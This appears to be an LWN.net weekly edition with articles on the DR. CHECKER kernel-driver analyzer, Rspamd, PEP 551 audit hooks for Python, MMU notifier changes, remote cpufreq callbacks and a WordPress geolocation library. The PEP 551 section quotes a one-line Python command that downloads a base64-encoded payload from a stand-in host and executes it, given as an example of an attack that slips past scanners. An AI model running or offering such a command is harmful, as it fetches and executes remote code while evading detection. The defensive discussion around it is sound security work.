This edition contains the following feature content:

This week's edition also includes these inner pages:

Brief items: Brief news items from throughout the community.

Announcements: Newsletters, conferences, security updates, patches, and more.

Please enjoy this week's edition, and, as always, thank you for supporting LWN.net.

Comments (none posted)

Drivers are a consistent source of kernel bugs, at least partly due to less review, but also because drivers are typically harder for tools to analyze. A team from the University of California, Santa Barbara has set out to change that with a static-analysis tool called DR. CHECKER. In a paper [PDF] presented at the recent 26th USENIX Security Symposium, the team introduced the tool and the results of running it on nine production Linux kernels. Those results were rather encouraging: "it correctly identified 158 critical zero-day bugs with an overall precision of 78%".

Technique

The researchers, Aravind Machiry, Chad Spensky, Jake Corina, Nick Stephens, Christopher Kruegel, and Giovanni Vigna, added their analysis module to the LLVM compiler. It is a "soundy" analysis—a term derived from "soundiness"—which means that it is mostly based on fully accurate (or sound) reasoning about the program. In order to keep the analysis space tractable and to provide usable results without overwhelming numbers of false positives, various unsound assumptions and tradeoffs are made. The researchers tried to limit those, however:

We are able to overcome many of the inherent limitations of static analysis by scoping our analysis to only the most bug-prone parts of the kernel (i.e., the drivers), and by only sacrificing soundness in very few cases to ensure that our technique is both scalable and precise. DR. CHECKER is a fully-automated static analysis tool capable of performing general bug finding using both pointer and taint analyses that are flow-sensitive, context-sensitive, and field-sensitive on kernel drivers.

As part of the motivation for creating the tool, the team describes an integer overflow bug found in the Huawei Bastet driver. The driver uses a user-controlled field in a structure to calculate the size of a buffer to allocate, but the integer overflow allows an attacker to cause the buffer to be far too small, resulting in a buffer overrun. As described in the paper, the bug demonstrates the need for a tool like DR. CHECKER:

There are many notable quirks in this bug that make it prohibitively difficult for naïve static analysis techniques. First, the bug arises from tainted-data (i.e., argp ) propagating through multiple usages into a dangerous function, which is only detectable by a flow-sensitive analysis. Second, the integer overflow occurs because of a specific field in the user-provided struct , not the entire buffer. Thus, any analysis that is not field sensitive would over-approximate this and incorrectly identify flow_p as the culprit. Finally, the memory corruption in a different function (i.e., adjust_traffic_flow_by_pkg ), which means that that the analysis must be able to handle inter-procedural calls in a context-sensitive way to precisely report the origin of the tainted data. Thus, this bug is likely only possible to detect and report concisely with an analysis that is flow-, context-, and field-sensitive. Moreover, the fact that this bug exists in the driver of a popular mobile device, shows that it evaded both expert analysts and possibly existing bug-finding tools.

DR. CHECKER takes a modular approach to its analysis. There are two analysis clients that are invoked throughout the analysis pass through the code, which is called the "soundy driver traversal" (SDT). Those clients share global state and can benefit from each others' results. Once that pass is complete, the global state is used by various vulnerability detectors to find specific kinds of bugs and generate warnings.

In order to focus solely on the driver code, the tool makes the assumption that Linux API calls operate completely correctly, so that they lie outside the scope of the analysis. That means that only function calls within the driver need to be followed and tracked

The two clients implement a "points-to" analysis to determine where pointers are pointing in a field-sensitive way and a "taint" analysis to determine when values could have been provided by user space. The points-to client tracks dynamic allocation as well as static and automatic variables. It knows enough about the kernel API to recognize allocation functions; it can also recognize the effects of library calls like memcpy() . The taint analysis looks at the sources for tainted data, either as arguments to entry points (e.g. ioctl() ) or via kernel functions that copy data from user space (e.g. copy_from_user() ).

There are eight separate vulnerability detectors that are each briefly described in the paper. Almost all of them look for incorrect handling of tainted data in one way or another, so they are heavily reliant on the taint analysis results. The tests look at such things as improperly using tainted data (e.g. passing to risky functions like strcmp() ), arithmetic on tainted data that could lead to an under or overflow, casts to differently sized types, dereferencing tainted pointers, accessing global variables without proper locking, and so on.

The paper goes into quite a bit of detail of the techniques used and is worth a read for those interested. There were some logistical hurdles to overcome in trying to identify the vendor drivers in multiple kernel source trees. Beyond that, finding the entry points into the drivers was tricky as well; different subsystems have different views of the offset for a driver's ioctl() function, for example.

Results

The researchers ran DR. CHECKER on the drivers in nine mobile devices from four different manufacturers. A total of 3.1 million lines of code was analyzed in 437 separate drivers. They also ran four other static-analysis tools: flawfinder, RATS, Cppcheck, and Sparse. Ultimately, those tools were found wanting for a variety of reasons, most often because of the number of false positives generated.

DR. CHECKER uses Clang to compile each of the driver source files into LLVM bitcode, which contains the compiler's intermediate representation. Compiling the drivers required some changes to Clang to support the GCC-specific constructs and compiler flags used by the normal kernel build. Those individual bitcode files are then combined using the llvm-link tool to create a single file to hand off to DR. CHECKER.

Some 5,000 warnings were generated, of which nearly 4,000 were verified as correct by the team. Of those, 158 were actual bugs that were reported upstream and fixed. So 78% of the reports were correct and 3% actually resulted in security fixes for the kernel. The paper noted that there are a number of improvements that could be made to reduce duplicated, but correct, warnings as well as false positives. It also points out that the code could likely be adapted for other code bases.

Overall, DR. CHECKER looks like a useful tool that could potentially be applied more widely. Vendors may wish to analyze their drivers and device makers could do the same for all of the drivers in their device. It would also seem like there may be some lurking bugs in mainline drivers that could be ferreted out using the tool.

[Thanks to Paul Wise for pointing us toward DR. CHECKER.]

Comments (41 posted)

Running one's own mail system on the Internet has become an increasingly difficult thing to do, to the point that many people don't bother, even if they have the necessary skills. Among the challenges is spam; without effective spam filtering, an email account will quickly drown under a deluge of vile offers, phishing attempts, malware, and alternative facts. Many of us turn to SpamAssassin for this task, but it's not the only alternative; Rspamd is increasingly worth considering in this role. Your editor gave Rspamd a spin to get a sense for whether switching would be a good thing to do.

SpamAssassin is a highly effective tool; its developers could be forgiven for thinking that they have solved the spam problem and can move on. Which is good, because they would appear to have concluded exactly that. The "latest news" on the project's page reveals that the last release was 3.4.1, which came out in April 2015. Stability in a core communications tool is good but, still, it is worth asking whether there is really nothing more to be done in the area of spam filtering.

The Rspamd developers appear to believe that there is; this project is moving quickly with several releases over the past year, the last being 1.6.3 at the end of July. The project's repository shows 2,545 commits since the 1.3.5 release on September 1, 2016; 32 developers contributed to the project in that time, though one of them (Vsevolod Stakhov) was the source of 71% of the commits. The project is distributed under the Apache License v2.

The Rspamd developers clearly see processing speed as one of their selling points. SpamAssassin, written in Perl, is known to be a bit of a resource hog. Rspamd is written in C (with rules and extensions in Lua), and claims to be able to "process up to 100 emails per second using a single CPU core". That should be sufficiently fast for most small-to-medium sites, though it is probably advisable to dedicate another CPU to the task if there are any linux-kernel subscribers in the mix.

One of the nice things about SpamAssassin is that it's relatively easy to set up; in an extreme, it can be run from a nonprivileged account using a procmail incantation with no daemon process required. Rspamd is not so simple; it really wants to run as a separate daemon that is tightly tied into the mail transport agent (MTA). That means, for example, configuring Postfix to pass messages to the Rspamd server; the configuration of Rspamd itself can also be fairly involved. As a result, experimenting with Rspamd is not quite so simple. But, in return, one gets a number of useful features.

Perhaps foremost, the direct integration with the MTA means that spam filtering takes place while the SMTP conversation is ongoing. That makes techniques like greylisting possible. It also enables the rejection of overt spam outright, before it has been accepted from the remote server; this has a couple of advantages: there is no need to store the spam locally, and the sender will get a bounce — assuming there is a real sender who cares about such things. Yes, one can configure things to use SpamAssassin in this way, but it involves a rather larger amount of duct tape.

Rspamd offers many of the same filtering mechanisms that SpamAssassin supports, including regular-expression matching, DKIM and SPF checks, and online blacklists. It has a bayesian engine that, the project claims, is more sophisticated and effective than SpamAssassin's; it looks at groups of words, rather than just single words. There is a "fuzzy hash" mechanism that is meant to catch messages that look like previous spam with trivial changes. As with SpamAssassin, each classification mechanism has a score associated with it; the sum of all the scores gives the overall spam score for a given message.

While it doesn't have to be this way, SpamAssassin is normally used in a binary mode: a message is either determined to be spam or it is not. Rspamd classifies messages into several groups, depending on how obvious its nature is. At different scores, a message might be greylisted, have its subject line marked, have an X-Spam header added, or be rejected outright. Implementing all of these actions requires cooperation from the MTA, of course.

Rspamd comes with its own built-in web server which, by default, is only available through the loopback interface. It can present various types of plots describing the traffic it has processed, as can be seen on the right. The server can also be used to alter the configuration on the fly, changing the scores associated with various tests, and more. These changes do not appear to be saved permanently, though, so the system administrator still has to edit the (numerous) configuration files to make a change that will stick.

Your editor set up and ran Rspamd with a copy of his email stream. What followed was an unpleasant exercise in going carefully through the spam folder to see what the results were — a task that resembles cleaning up after the family pet with one's bare hands and which quickly reduces one's faith in humanity as a whole. The initial results were a little discouraging, in that Rspamd filtered spam less effectively than SpamAssassin. More discouraging was a fair number of false positives. When the number of incoming spam messages reaches into the thousands per day, one tends not to spend much time looking for messages that were erroneously classified as spam, especially as confidence in the filter grows. So false positives are legitimate email that will probably never be seen; avoiding false positives thus tends to be a high priority for developers of spam filters.

At this point, though, the comparison was somewhat unfair: a fresh Rspamd was pitted against a SpamAssassin with a well-trained bayesian filter. Like SpamAssassin, Rspamd provides a tool that can be used to feed messages for filter training. Your editor happened to have both a mail archive and a massive folder full of spam sitting around. Training the filter with both of those yielded considerably better results and, in particular, an apparent end to false positives — with one exception. And yes, the rspamc tool, used to train the filter, runs far more quickly than sa_learn does.

The one exception regarding false positives is significant. The documentation of Rspamd's pattern-matching rules is poor relative to SpamAssassin, so it took a while to find out what MULTIPLE_UNIQUE_HEADERS is looking for. In short, it is checking the message for multiple instances of headers that should appear only once ( References: or In-Reply-to: , for example). The penalty for this infraction is severe: ten points, enough to condemn a message on its own, even if, say, the bayesian filter gives a 100% probability that the message is legitimate. Unfortunately, git send-email is prone to duplicating just those headers at times, with the result that patches end up in the spam folder.

SpamAssassin has an interesting mechanism for automatically computing what the score for each rule should be. Rspamd does not appear to have anything equivalent; how its scores have been determined is not entirely clear. The overall feeling the results suggests a relative lack of maturity that has the potential to create the occasional surprise.

After a few days of use, the overall subjective impression is that Rspamd is nearly — but not quite — as effective as SpamAssassin. It seems especially likely to miss the current crop of "your receipt" spams containing nothing but a hostile attachment. That said, training has improved its performance quickly and may well continue to do so. The experiment will be allowed to run for a while yet.

So is moving from SpamAssassin to Rspamd a reasonable thing to do? A site with a working SpamAssassin setup may well want to stay with it if the users are happy with the results. There might also be value in staying put for anybody who fears the security implications of a program written in C that is fully exposed to a steady stream of hostile input. The project does not appear to have ever called out an update with security implications; it seems unlikely that there have never been any security-relevant bugs fixed in a tool of this complexity.

But, for anybody who sees the benefit of a more active development community, better performance, better MTA integration, newer filtering mechanisms, and a web interface with cute pie charts, changing over might make sense. There is even a module to import custom SpamAssassin rules to make the task easier (but there is no way to import an existing SpamAssassin bayesian database). In any case, it is good to see that development on spam filters continues, even if the SpamAssassin community has mostly moved on to other things.

Comments (40 posted)

As Steve Dower noted in his lightning talk at the 2017 Python Language Summit, Python itself can be considered a security vulnerability—because of its power, its presence on a target system is a boon to attackers. Now, Dower is trying to address parts of that problem with a Python Enhancement Proposal (PEP) that would enable system administrators and others to detect when Python is being used for a nefarious purpose by increasing the "security transparency" of the language. It is not a solution that truly thwarts an attacker's ability to use Python in an unauthorized way, but will make it easier for administrators to detect, and eventually disable, those kinds of attacks.

Threats

In PEP 551 (Security transparency in the Python runtime), Dower described the aim of the proposal: "The goals in order of increasing importance are to prevent malicious use of Python, to detect and report on malicious use, and most importantly to detect attempts to bypass detection." He also posted his first draft of the PEP to the Python security-sig mailing list. In the preface of that post, he gave a bit more detail on where the idea has come from and what it is meant to do:

This comes out of work we've been doing at Microsoft to balance the flexibility of scripting languages with their usefulness to malicious users. PowerShell in particular has had a lot of work done, and we've been doing the same internally for Python. Things like transcripting (log every piece of code when it is compiled) and signature validation (prevent loading unsigned code). This PEP is about upstreaming enough functionality to make it easier to maintain these features - it is *not* intended to add specific security features to the core release. The aim is to be able to use a standard libpython3.7/python37.dll with a custom python3.7/python.exe that adds those features (listed in the PEP).

The kinds of attacks that PEP 551 seeks to address are advanced persistent threats (APTs) that make use of vulnerabilities of various sorts to establish a beachhead inside a network. Often Python is used from there to further the reach of the APT to other systems and networks, generally to extract data, but sometimes to damage data or hardware; Dower mentioned WannaCrypt (or WannaCry) and Stuxnet as examples of the latter. Python provides plenty for attackers to work with:

python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen( 'http://my-exploit/py.b64')).decode())" This command currently bypasses most anti-malware scanners that rely on recognizable code being read through a network connection or being written to disk (base64 is often sufficient to bypass these checks). It also bypasses protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet or access another machine on the local network from which to obtain its payload). Python is a particularly interesting tool for attackers due to its prevalence on server and developer machines, its ability to execute arbitrary code provided as data (as opposed to native binaries), and its complete lack of internal logging. This allows attackers to download, decrypt, and execute malicious code with a single command::This command currently bypasses most anti-malware scanners that rely on recognizable code being read through a network connection or being written to disk (base64 is often sufficient to bypass these checks). It also bypasses protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet or access another machine on the local network from which to obtain its payload).

New API

To combat the problem, Dower is proposing some additions to the Python API to "to enable system administrators to integrate Python into their existing security systems, without dictating what those systems look like or how they should behave". There are two parts to the proposal, adding audit hooks that will be called from certain sensitive places within the Python runtime and standard library, and adding a way to intercept calls to open a file for execution (e.g. imports) to perform additional checks, such as permission or integrity checks, before the operation is performed.

For auditing, there would be calls added to the C and Python APIs to add an audit event to the stream or to add a callback that would be made when an event is generated. For C, it would look as follows:

typedef int (*hook_func)(const char *event, PyObject *args); /* Add an auditing hook */ int PySys_AddAuditHook(hook_func hook); /* Raise an event with all auditing hooks */ int PySys_Audit(const char *event, PyObject *args);

_Py_ClearAuditHooks()

# Add an auditing hook sys.addaudithook(hook: Callable[str, tuple]) -> None # Raise an event with all auditing hooks sys.audit(str, *args) -> None

addaudithook()

audit()

None

There is also an internal cleanup function described (). Python code could access these capabilities using:Those are both taken from the PEP, which uses the type annotations for the Python code. As expected,takes a callable with effectively the same kinds of arguments (a string and tuple) as are passed to. Both functions will return

CPython and the standard library would get calls to PySys_Audit() and sys.audit() in multiple locations, while audit hooks would be added by administrators. Multiple hooks can be added and they will be called in the order in which they were added; if a hook causes an exception, any further hooks are ignored and (normally) the Python runtime will exit.

The second API addition allows administrators to add a verification step before Python opens a file for execution. A single verification handler can be registered from C:

typedef PyObject *(*handler_func)(const char *narrow, const wchar_t *wide); /* Set the handler */ int Py_SetOpenForExecuteHandler(handler_func handler);

# Open a file using the handler os.open_for_exec(pathlike)

open(pathlike,'rb')

importlib

open_for_exec()

os

nt

posix

The handler function will be passed the path of the file to be opened (in either narrow or wide format depending on the platform). The handler should do whatever verification it needs to do and return a file-like object that allows reading bytes, or raise an exception if the verification fails. Python code in the standard library that opens a file for execution will call:That function is a drop-in replacement for, which opens the file for read-only, binary access. Sincewill need to usebeforehas been imported, there will be another version of it in the OS-specificandmodules.

The PEP does note that it is easy for attackers' code to monkey patch importlib to remove the verification; auditing hooks should be used to detect and handle that case. In addition, there are other mechanisms that can be used to execute code that does not come directly from a file (e.g. compile() , exec() ); auditing those will need to be part of any real solution.

Those new APIs provide the means for an administrator to "look inside" the Python runtime but, in order to be effective, changes need to be made to the Python binary to enable the features. That's where the spython binary comes into play. Though the name is already undergoing some bikeshedding, the idea is to provide an example of a "restricted" Python binary that could be installed on production systems to try to detect or thwart APTs. Dower's GitHub repository that contains his current implementation of the APIs has the source for spython.c.

Recommendations

The PEP strongly recommends that administrators create their own version of the spython program that reflects local policies and priorities. The example program takes no arguments other than a script name and logs all audit events to a scriptname.log file. It restricts importable modules (to only .py files, which disallows using cached bytecode from .pyc files) and global name lookup for the pickle module. It also disallows any hooks being added after those it installs. Spython can be built in the Python source tree and will be used in the test suite, but it will not be shipped with python.org binary distributions; other distributions are expected to only ship it as an example or test binary.

Overall, the idea is to give administrators a new level of control of the capabilities of the Python they install without having to hack the core Python code. Anecdotal evidence suggests that organizations are moving away from Python because it lacks a way to integrate the language with the other security features normally used on their systems. Installing Python becomes a liability in those environments, which makes administrators shy away from it.

The PEP comes with a set of recommendations for administrators to give them a guide of the best practices for using the "security transparency" features it enables. For example:

The default python entry point should not be deployed to production machines, but could be given to developers to use and test Python on non-production machines. Sysadmins may consider deploying a less restrictive version of their entry point to developer machines, since any system connected to your network is a potential target. Sysadmins may deploy their own entry point as python to obscure the fact that extra auditing is being included.

Other recommendations include using the native auditing system, rather than simply writing local files, not aborting the interpreter for abnormal events since it will encourage attackers to work around those features (because detection is a higher priority than prevention), and to correlate events that should happen together (e.g. import, followed by open_for_exec() , then compile) in order to detect attempts to bypass auditing. The PEP notes that the list is (necessarily) incomplete and that more recommendations may be added over time.

So far, no real performance numbers have been gathered. The intent is for the feature to have minimal impact when it is not being used. Since it is an opt-in feature, though, the performance with hooks enabled is not really at issue (though one presumes it will be reasonably optimized). "Preliminary testing shows that calling sys.audit with no hooks added does not significantly affect any existing benchmarks, though targeted microbenchmarks can observe an impact." Another unfinished piece is to add more hook locations to the core and standard library.

Reception

The comments on the proposal have been fairly limited, but are quite favorable overall. There were some suggestions and thoughts in response to the first posting in the security-sig mailing list. The PEP was then updated and posted to python-dev for wider review. In the end, the PEP really only provides a way for administrators to look inside the interpreter, what they do with that ability is largely beyond its scope. But it does enable administrators to relatively easily do something they cannot do now.

There were concerns posted in both threads about circumventing the auditing (or forging audit events), but both of those are seen (by Dower, at least) as potential red flags for detecting the malicious activity. However, moving to a separate module (rather than using sys ), as suggested by Nick Coghlan, was seen as making it too easy to replace the functionality. As Dower put it:

It's important to minimise the surface area of these features, and having the ability to disable auditing by shadowing/replacing a module is a little scary. At least when you replace sys you've got to do a bit of work to keep it a secret. (This is also the reasoning for using static variables internally rather than interpreter state - it's much harder to infer the address of a static C variable with pure Python code than a field in a struct.)

James Powell, who did a lot of initial research and implementation of the feature, also chimed in:

I'll add a little bit of detail. These aren't "security features"; they're "security transparency features." We acknowledge that we cannot block every malicious payload, but we should at least make it possible to audit interpreter state for post-mortem forensic purposes. We wouldn't want it to be too easy to turn off these auditing features, and I've done a good amount of research into corrupting the running state of a CPython interpreter. Keeping things in builtin modules and in memory not directly exposed to the interpreter creates a real barrier to these techniques, and makes it meaningfully harder for an attacker to just disable the features at the start of their payload.

Adding the feature seems like a near no-brainer, unless some serious performance or other problems rear their head—not a likely outcome, seemingly. So far, there has been no reaction from Guido van Rossum, Python's benevolent dictator for life (BDFL), but he will ultimately either rule on it or appoint a BDFL-delegate to do so. It is quite plausible we will see PEP 551 delivered in Python 3.7, which is due in mid-2018.

Comments (6 posted)

a badly designed mistake

One does not normally expect to see significant changes to an important internal memory-management mechanism in the time between the ‑rc7 prepatch and the final release for a development cycle, but that is exactly what happened just before 4.13 was released. A regression involving the memory-management unit (MMU) notifier mechanism briefly threatened to delay this release, but a last-minute scramble kept 4.13 on schedule and also resulted in a cleanup of that mechanism. This seems like a good time to look at a mechanism that Linus Torvalds called "" and how it was made to be a bit less mistaken.

MMU Notifiers

A computer's memory-management unit handles the mapping between virtual and physical addresses, tracks the presence of physical pages in memory, handles memory-access permissions, and more. Much of the work of the memory-management subsystem is concerned with keeping the MMU properly configured in response to workload changes on the system. The details of MMU management are nicely hidden, so that the rest of the kernel does not (most of the time) have to worry about it, and neither does user space.

Things have changed over the last ten years or so in ways that have rendered the concept of "the MMU" rather more fuzzy. The initial driver of this change was virtualization; a mechanism like KVM must ensure that the host and the guest's view of the MMU are consistent. That typically involves managing a set of shadow page tables within the guest. More recently, other devices have appeared on the memory bus with their own views of memory; graphics processing units (GPUs) have led this trend with technologies like GPGPU, but others exist as well. To function properly, these non-CPU MMUs must be updated when the memory-management subsystem makes changes, but the memory-management code is not able (and should not be able) to make changes directly within the subsystems that maintain those other MMUs.

To address this problem, Andrea Arcangeli added the MMU notifier mechanism during the 2.6.27 merge window in 2008. This mechanism allows any subsystem to hook into memory-management operations and receive a callback when changes are made to a process's page tables. One could envision a wide range of callbacks for swapping, protection changes, etc., but the actual approach was simpler. The main purpose of an MMU notifier callback is to tell the interested subsystem that something has changed with one or more pages; that subsystem should respond by simply invalidating its own mapping for those pages. The next time a fault occurs on one of the affected pages, the mapping will be re-established, reflecting the new state of affairs.

There are a few ways of signaling the need for invalidation, though, starting with the invalidate_page() callback:

void (*invalidate_page)(struct mmu_notifier *mn, struct mm_struct *mm, unsigned long address);

This callback can be invoked after the page-table entry for the page at address in the address space indicated by mm has been removed, but while the page itself still exists. That is not the only notification mechanism, though; larger operations can be signaled with:

void (*invalidate_range_start)(struct mmu_notifier *mn, struct mm_struct *mm, unsigned long start, unsigned long end); void (*invalidate_range_end)(struct mmu_notifier *mn, struct mm_struct *mm, unsigned long start, unsigned long end);

In this case, invalidate_range_start() is called while all pages in the affected range are still mapped; no more mappings for pages in the region should be added in the secondary MMU after the call. When the unmapping is complete and the pages have been freed, invalidate_range_end() is called to allow any necessary cleanup to be done.

Finally, there is also:

void (*invalidate_range)(struct mmu_notifier *mn, struct mm_struct *mm, unsigned long start, unsigned long end);

This callback is invoked when a range of pages is actually being unmapped. It can be called between calls to invalidate_range_start() and invalidate_range_end() , but it can also be called independently of them in some situations. One might wonder why both invalidate_page() and invalidate_range() exist and, indeed, that is where the trouble started.

The end of invalidate_page()

In late August, Adam Borowski reported that he was getting warnings from the 4.13-rc kernel when using KVM, followed by the quick demise of the host system. Others had been experiencing similar strangeness, including a related crash that seemed to be tied to the out-of-memory handler. After testing and bisection, this commit, fixing another bug, was identified as the culprit.

The problem came down to a difference between the invalidate_page() and invalidate_range() callbacks: the former is allowed to sleep, while the latter cannot. The offending commit was trying to fix a problem where invalidate_page() was called with a spinlock held — a context where sleeping is not allowed — by calling invalidate_range() instead. But, as Arcangeli pointed out, that will not lead to joy, since not all users implement invalidate_range() ; it is necessary to call invalidate_range_start() and invalidate_range_end() instead.

The real fix turned out to not be quite so simple, though. Among other things, the fact that invalidate_page() can sleep makes it fundamentally racy. It cannot be called while the page-table spinlock affecting the page to be invalidated is held, meaning that the page-table entry can change before or during the call. This sort of issue is why Torvalds complained about the MMU notifiers in general and stated that they simply should not be able to sleep at all. But, as Jérôme Glisse pointed out, some use cases absolutely require the ability to sleep:

There is no way around sleeping if we ever want to support thing like GPU. To invalidate page table on GPU you need to schedule commands to do so on GPU command queue and wait for the GPU to signal that it has invalidated its page table/tlb and caches. We had this discussion before. Either we want to support all the new fancy GPGPU, AI and all the API they rely on or we should tell them sorry guys not on linux.

Torvalds later backed down a little, making a distinction between two cases. Anything dealing with virtual addresses and the mm_struct structure can sleep, while anything dealing with specific pages and page-table entries cannot. Thus, the invalidate_range_start() and invalidate_range_end() callbacks, which deal with ranges of addresses and are called without any spinlocks held, can sleep. But invalidate_range() and invalidate_page() cannot.

That, in turn, suggests that invalidate_page() is fundamentally wrong by design. After some discussion, Torvalds concluded that the best thing to do would be to remove it entirely. But, as the bug that started the discussion showed, replacing it with invalidate_range() calls is not a complete solution to the problem. To make things work again in all settings, including those that need to be able to sleep, the invalidate_range() calls must always be surrounded by calls to invalidate_range_start() and invalidate_range_end() .

Glisse quickly implemented that idea and, after a round of review, his patch set was fast-tracked into the 4.13 kernel three days before its release. So, as a last-minute surprise, the invalidate_page() MMU notifier is gone; out-of tree modules that used it will not work with 4.13 until they are updated. It is rare to see a change of this nature merged so late in the development cycle, but the alternative was to release with real regressions and the confidence in the fix was high. With luck, this fix will prevent similar problems from occurring in the future.

There is still one problem related to MMU notifiers in the 4.13 kernel, though: it turns out that the out-of-memory reaper, which tries to recover memory more quickly from processes that have been killed in an out-of-memory situation, does not invoke the notifiers. That, in turn, can lead to corruption on systems where notifiers are in use and memory runs out. Michal Hocko has responded with a patch to disable the reaper on processes that have MMU notifiers registered. He took that approach because the notifier implementations are out of the memory-management subsystem's control, and he worried about what could happen in an out-of-memory situation, where the system is already in a difficult state. This patch has not been merged as of this writing, but something like it will likely get in soon and find its way into the stable trees.

Notifier callbacks have a bit of a bad name in the kernel community. Kernel developers like to know exactly what will happen in response to a given action, and notifiers tend to obscure that information. As can be seen in the original bug and the reaper case, notifiers may also not be called consistently throughout a subsystem. But they can be hard to do without, especially as the complexity of the system grows. Sometimes the best that can be done is to be sure that the semantics of the notifiers are clear from the outset, and to be willing to make fundamental changes when the need becomes clear — even if that happens right before a release.

Comments (7 posted)

The kernel's CPU-frequency ("cpufreq") governors are charged with picking an operating frequency for each processor that minimizes power use while maintaining an adequate level of performance as determined by the current policy. These governors normally run locally, with each CPU handling its own frequency management. The 4.14 kernel release, though, will enable the CPU-frequency governors to control the frequency of any CPU in the system if the architecture permits, a change that should improve the performance of the system overall.

For a long time, the cpufreq governors used the kernel's timer infrastructure to run at a regular interval and sample CPU utilization. That approach had its shortcomings; the biggest one was that the cpufreq governors were running in a reactive mode, choosing the next frequency based on the load pattern in the previous sampling period. There is, of course, no guarantee that the same load pattern will continue after the frequency is changed. Additionally, there was no coordination between the cpufreq governors and the task scheduler. It would be far better if the cpufreq governors were proactive and, working with the scheduler, could choose a frequency that suits the load that the system is going to have in the next sampling period.

In the 4.6 development cycle, Rafael Wysocki removed the dependency on kernel timers and placed hooks within the scheduler itself. The scheduler calls these hooks for certain events, such as attaching a task to a run queue or when the load created by the processes in run queue changes. The hooks are implemented by the individual cpufreq governors. Those governors register and unregister their CPU-utilization update callbacks with the scheduler using the following interfaces:

void cpufreq_add_update_util_hook(int cpu, struct update_util_data *data, void (*func)(struct update_util_data *data, u64 time, unsigned int flags)); void cpufreq_remove_update_util_hook(int cpu);

Where struct update_util_data is defined as:

struct update_util_data { void (*func)(struct update_util_data *data, u64 time, unsigned int flags); };

The scheduler internally keeps per-CPU pointers to the struct update_util_data which is passed to the cpufreq_add_update_util_hook() routine. Only one callback can be registered per CPU. The scheduler starts calling the cpufreq_update_util_data->func() callback from the next event that happens after the callback is registered.

The legacy governors (ondemand and conservative) are still considered to be reactive, as they continue to rely on the data available from the last sampling period to compute the next frequency to run. Specifically, they calculate CPU load based on how much time a CPU was idle in the last sampling period. However, the schedutil governor is considered to be proactive, since it calculates the next frequency based on the average utilization of the CPU's current run queue. The schedutil governor will pick the maximum frequency for a CPU if any realtime or deadline tasks are available to run.

Remote callbacks

In current kernels, the scheduler will call these utilization-update hooks only if the target run queue, the queue for the CPU whose utilization has changed, is the run queue of the local CPU. While this works well for most scheduler events, it doesn't work that well for some. This mostly affects performance of only the schedutil cpufreq governor, since the others don't take the average utilization into consideration when calculating the next frequency.

With certain types of systems, such as Android, the latency of cpufreq response to certain scheduling events can be critical. As the cpufreq callbacks aren't called from remote CPUs currently, it means there are certain situations where a target CPU may not run the cpufreq governor for some time.

For example, consider a system where a task is running on a given CPU, and a second task is queued to run on that CPU by a different CPU. If the newly enqueued task has a high CPU demand, the target CPU should increase its frequency immediately (based on the utilization average of its run queue) to meet that demand. But, because of the above-mentioned limitation, this does not occur as the task was enqueued by a remote CPU. The schedutil cpufreq governor's utilization update hook will be called only on the next scheduler event, which may happen only after some microseconds have passed. That is bad for performance-critical tasks like the Android user interface. Most Android devices refresh the screen at 60 frames per second; that is 16ms per frame. The screen rendering has to finish within these 16ms to avoid jerky motion. If 4ms are taken by the cpufreq governor to update the frequency, then the user's experience isn't going to be nice.

This problem can be avoided by invoking the governor to change the target CPU's frequency immediately after queuing the new task, but that may not always be possible or practical; the processor architecture may not allow it. For example, the x86 architecture updates CPU frequencies by writing to local, per-CPU registers, which remote CPUs cannot do. Sending an inter-processor interrupt to the target CPU to update its frequency sounds like overkill and will add unnecessary noise for the scheduler. Using interrupts could add just the sort of latency that this work seeks to avoid.

On the other hand, updating CPU frequencies on the ARM architecture is normally CPU-independent; any CPU can change the frequency of any other CPU. Thus, the patch set enabling remote callbacks took the middle approach and avoided sending inter-processor interrupts to the target CPU. The patch set is queued in the power-management tree for the 4.14-rc1 kernel release. The frequency of a CPU can now be changed remotely by a CPU that shares cpufreq policy with the target CPU; that is, both the CPUs share their clock and voltage rails and switch performance state together. But CPU-frequency changes can also be made from any other CPU on the system if the cpufreq policy of the target CPU has the policy->dvfs_possible_from_any_cpu field set to true. This is a new field and must be set by the cpufreq driver from its cpufreq_driver->init() callback if it allows changing frequencies from CPUs running a different cpufreq policy. The generic device-tree based cpufreq driver is already updated to enable remote changes.

Remote cpufreq callbacks will be enabled (by default) in the 4.14 kernel release; they should improve the performance of the schedutil governor in a number of scenarios. Other architectures may want to consider updating their cpufreq drivers to set policy->dvfs_possible_from_any_cpu field to true if they can support cross-CPU frequency changes.

Comments (3 posted)

As much as we get addicted to mobile phones and online services, nobody (outside of cyberpunk fiction) actually lives online. That's why maps, geolocation services, and geographic information systems (GISes) have come to play a bigger role online. They reflect they way we live, work, travel, socialize, and (in the case of natural or human-made disasters, which come more and more frequently) suffer. Thus there is value in integrating geolocation into existing web sites, but systems like WordPress do not make supporting that easy. The software development firm LuminFire has contributed to the spread of geolocation services by creating a library for WordPress that helps web sites insert geolocation information into web pages. This article describes how LuminFire surmounted the challenges posed by WordPress and shows a few uses for the library.

LuminFire developer Michael Moore presented the library, called WP-GeoMeta-Lib, at a talk (the slides are available in Moore's blog posting) on August 16 at FOSS4G, the major open-source geolocation conference. FOSS4G's success itself demonstrates the growing importance of geolocation, as well as the thriving free-software communities that create solutions for it through group projects such as the Open Source Geospatial Foundation (OSGeo). FOSS4G held its first conference in 2007 in Thailand. Its global wanderings, which would require sophisticated geolocation tools to track, brought it this year to Boston, where it topped 1,100 registered attendees—its biggest turnout yet.

With so many GIS projects aimed at the web, such as the popular Leaflet JavaScript library, why try to do geolocation through WordPress? LuminFire developed its library to satisfy requests from its clients, but Moore threw us some statistics to show how important the project would be to the larger public. One estimate claims that 28% of the world's web sites use WordPress. Thus, a good GIS service for WordPress can vastly increase the availability of geographic information.

So what are the problems? The data you store for web pages—including geospatial data—is called metadata by WordPress. It stores this data as plain text. The existing GIS plugins have to manipulate geospatial information as text, or convert it back and forth between text and a native format, which is all cumbersome and slow. Furthermore, WordPress uses MySQL for its storage. I believe this bolsters the popularity of WordPress, because MySQL is easy to use and adequate for typical web needs. But it has a limited geospatial model. Although both MySQL and its fork, MariaDB, have made strides adding spatial support, its spatial analysis capabilities are paltry compared to PostgreSQL. The PostgreSQL geospatial extension, PostGIS, is an anchor of the free-software GIS movement, and could be found all over the FOSS4G conference.

